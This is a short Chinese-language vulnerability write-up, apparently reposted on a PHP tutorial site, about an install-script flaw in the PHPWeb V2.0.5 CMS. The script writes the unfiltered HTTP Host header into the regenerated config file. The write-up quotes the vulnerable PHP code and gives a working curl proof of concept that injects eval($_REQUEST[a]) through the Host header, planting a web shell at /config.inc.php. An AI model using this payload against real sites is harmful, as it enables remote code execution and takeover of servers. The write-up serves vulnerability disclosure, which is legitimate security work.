来源:自学PHP网 时间:2015-04-17 12:00 作者: 阅读:次
[导读] 软件版本: V2.0.5 / 20120412商业收费软件官网:www.phpweb.net之所以鸡肋就是该漏洞利用安装文件 重新生成 配置文件 写入可执行代码鸡肋1: 具有破坏性 动作非常大 重新写了配置文件 数据...
|
软件版本: V2.0.5 / 20120412
商业收费软件
官网:www.phpweb.net
之所以鸡肋就是该漏洞利用安装文件 重新生成 配置文件 写入可执行代码
鸡肋1: 具有破坏性 动作非常大 重新写了配置文件 数据库连接文件
鸡肋2: 有一定安全常识的站长都会删掉 install 目录
虽然鸡肋 但也有优点 : 不受 magic_quotes_gpc 、 webserver 影响
分析:
$siteurl="http://".$_SERVER["HTTP_HOST"]."/"; //未过滤
$filestr = fread(fopen($SysConfigFile, 'r'),30000);
$filestr=str_replace(" ","",$filestr);
$filestr=str_replace("DefaultDbHost",$dbhost,$filestr);
$filestr=str_replace("DefaultDbName",$dbname,$filestr);
$filestr=str_replace("DefaultDbUser",$dbuser,$filestr);
$filestr=str_replace("DefaultDbPass",$dbpwd,$filestr);
$filestr=str_replace("DefaultsLan","zh_cn",$filestr);
$filestr=str_replace("DefaultTablePre",$tablepre,$filestr);
$filestr=str_replace("DefaultSiteUrl",$siteurl,$filestr);
fwrite(fopen($ConFile,"w"),$filestr,30000);
www.2cto.com
$_SERVER["HTTP_HOST"] 就是 http head 中HOST传递过来的 可控制,并且不受 magic_quotes_gpc 影响 ^ _ ^
poc:
curl http://192.168.1.105/code_test/phpweb/base/install/index.php --data "dbhost=localhost&dbname=phpweb&dbuser=root&dbpwd=root&tablepre=pwn&nextstep=3&command=gonext&alertmsg=&username=" --header "HOST:localhost\";eval($_REQUEST[a]);#"
复制代码
shell地址: /config.inc.php
跟之前的 phpcms一样 需要远程数据库
|
自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习
京ICP备14009008号-1@版权所有www.zixuephp.com
网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com
